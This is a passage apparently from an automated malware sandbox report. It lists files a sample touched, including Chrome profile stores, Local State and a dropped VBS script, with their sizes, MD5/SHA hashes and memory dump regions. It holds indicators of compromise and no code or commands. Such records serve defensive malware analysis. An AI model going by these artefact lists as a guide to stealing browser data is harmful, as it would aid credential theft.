                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                      Filesize

                                                                      18KB

                                                                      MD5

                                                                      4ac8e2ae83ab859ec72494e25c070bd9

                                                                      SHA1

                                                                      aa567b5cf10588754d607882c963e33bd68a0940

                                                                      SHA256

                                                                      aa0ed35d00e573bd2fc0e5c88a0ca78ba030ee09bfdd81533e644924f4296008

                                                                      SHA512

                                                                      bffb85d84d4d0ebcae1356082922d9bbd27c8355c0137a8d643729baba8e6e973e842111c5577ef8183725f3eec6b660f5224b60e101eec8d81d6fa001a40da0

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

                                                                      Filesize

                                                                      72B

                                                                      MD5

                                                                      3ead59dda93528933b7d177dbbb03f80

                                                                      SHA1

                                                                      29b6b4005e363aa94874ae7c183a3468c8f60869

                                                                      SHA256

                                                                      ab498435f0e2ed8a6a982be3765826066156ed1ffd47675df4cb30ed59016ddc

                                                                      SHA512

                                                                      c82c0a6f7edfbad4823ec89fd6600adf67dfa9175f127df36222b4a2681294efe0e01b4b28eab996fe8ff305570616c45156760a0f2fd9e3f0c7a03585c9625a

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

                                                                      Filesize

                                                                      72B

                                                                      MD5

                                                                      36cd6a2e97b57072bfc494bd7dadc695

                                                                      SHA1

                                                                      f47a935a3bf5b83a4619765cd012bfef2e73b426

                                                                      SHA256

                                                                      91725dd36368488bc19431bf6d23ea7738c97368c06ede77fab68908114fda61

                                                                      SHA512

                                                                      95b4e802df47edda9bb6ad77ce162b63ef0c36e4869dad0fbf93f3161cd2a43049875c9a29c648dcf4b005c3f7792195f3b643832e4daa8543cd3c3e10b6aab1

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57f126.TMP

                                                                      Filesize

                                                                      48B

                                                                      MD5

                                                                      024cd44fb56513593ec4cb2888013326

                                                                      SHA1

                                                                      2c801fc8acab317329c0fc6dca4fc5f7c84b31ab

                                                                      SHA256

                                                                      1517fffffde43c41c809486716e76edad907bf146d804faf599dc8885c922de8

                                                                      SHA512

                                                                      542017633f3bd87ce5c24ac442f25cae40df411c11b8a5801f8adce3f7faa61d0fe805285b5d4784de3ade16287b75720daeece8e5d80e2c85d76230ffbb96fe

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\d4609872-60b1-4629-b9e8-5553834c8d67.tmp

                                                                      Filesize

                                                                      15KB

                                                                      MD5

                                                                      d3900e4a066d2fa14e01986ea73b2eae

                                                                      SHA1

                                                                      3c09cddacd639086ae61e05a2aa5097a8ea59782

                                                                      SHA256

                                                                      70071f8e2e49bc743d6a0d290bd4e2f427a28064470c196beb1cc184545017de

                                                                      SHA512

                                                                      147a00568d288c41514a0959e8e4ed85f212de9172914c952b30d960af8106cb93cfb7c3f37705f7c5c4e0f6d283c6620057d407a387e227ce0e952e087b4bc8

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                      Filesize

                                                                      80KB

                                                                      MD5

                                                                      9b53347851173fda9fcf338359ff7933

                                                                      SHA1

                                                                      c80b49f0b368947e6c5677c8309a0f2c35a794c7

                                                                      SHA256

                                                                      c2239d7a38df8cb105298a81bea1978dd2c56e075068889f167c4f2aac48e593

                                                                      SHA512

                                                                      e5606cd3ef565a7ea734a25c8f3c6f74fb82061cd9b2c90aba64176f6a06d0bdd85ff849ac4eef792b32b948ad22caae04a9c723efd2a5b69b58cc1f760fa0d9

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                      Filesize

                                                                      155KB

                                                                      MD5

                                                                      863c72bd1714766e28d83ea7dd6be81c

                                                                      SHA1

                                                                      85583da715a08297bf7306f917ac99cec2503a8b

                                                                      SHA256

                                                                      115773f773a27d66022bad20e052fd18db3424462228e0e50c2c37438019a5eb

                                                                      SHA512

                                                                      1e51858058c24bc1ca52fce916c8307dada8fdb8ba452cbf12fe87ca0cb72e7b9aff7afcb69db47cf95215aee234c1222681017f4db86a40c70b6bdfe45d1954

                                                                    • C:\Users\Admin\AppData\Local\Temp\BED.tmp\BEE.tmp\BEF.vbs

                                                                      Filesize

                                                                      588B

                                                                      MD5

                                                                      67706bca9ceaba11530e05d351487003

                                                                      SHA1

                                                                      3a5ed77f81b14093a5f18c4d46895bc7ea770fee

                                                                      SHA256

                                                                      190a0d994512ed000cf74bd40fb0502988c2ac48855b23a73fd905c0305fc30f

                                                                      SHA512

                                                                      902ac91678d85801a779acbc212c75beba72f8da996b0ed1b148a326c2dd635b88210f9a503fbbffa5271335483eae972e6a00acbc01ec013cf355c080444598

                                                                    • C:\Users\Admin\AppData\Local\Temp\scoped_dir1628_1759412024\0b9999fe-019e-4727-9881-45c355917373.tmp

                                                                      Filesize

                                                                      152KB

                                                                      MD5

                                                                      dd9bf8448d3ddcfd067967f01e8bf6d7

                                                                      SHA1

                                                                      d7829475b2bd6a3baa8fabfaf39af57c6439b35e

                                                                      SHA256

                                                                      fa2232917a5656ea4f811936561ea6b7c92b3c0004c5e08ecb97636d3afc6f72

                                                                      SHA512

                                                                      65347df34378c2bbb34417e2cccfb3251a0b2412422cc190eed9df525b6e0a9948e0295ea3c33b3ad873ce81e369e89a138ac41d6eb7229546c3269107e661de

                                                                    • memory/1172-389-0x0000013CF6620000-0x0000013CF6621000-memory.dmp

                                                                      Filesize

                                                                      4KB

                                                                    • memory/1172-400-0x0000013CF6620000-0x0000013CF6621000-memory.dmp

                                                                      Filesize

                                                                      4KB

                                                                    • memory/1172-402-0x0000013CF6620000-0x0000013CF6621000-memory.dmp

                                                                      Filesize

                                                                      4KB

                                                                    • memory/1172-403-0x0000013CF6620000-0x0000013CF6621000-memory.dmp

                                                                      Filesize

                                                                      4KB

                                                                    • memory/1172-404-0x0000013CF6620000-0x0000013CF6621000-memory.dmp

                                                                      Filesize

                                                                      4KB

                                                                    • memory/1172-405-0x0000013CF6620000-0x0000013CF6621000-memory.dmp

                                                                      Filesize

                                                                      4KB

                                                                    • memory/1172-406-0x0000013CF6620000-0x0000013CF6621000-memory.dmp

                                                                      Filesize

                                                                      4KB

                                                                    • memory/1172-407-0x0000013CF6620000-0x0000013CF6621000-memory.dmp

                                                                      Filesize

                                                                      4KB

                                                                    • memory/1172-391-0x0000013CF6620000-0x0000013CF6621000-memory.dmp

                                                                      Filesize

                                                                      4KB

                                                                    • memory/1172-390-0x0000013CF6620000-0x0000013CF6621000-memory.dmp

                                                                      Filesize

                                                                      4KB

                                                                    • memory/3560-0-0x00007FFA5FFBB000-0x00007FFA5FFBC000-memory.dmp

                                                                      Filesize

                                                                      4KB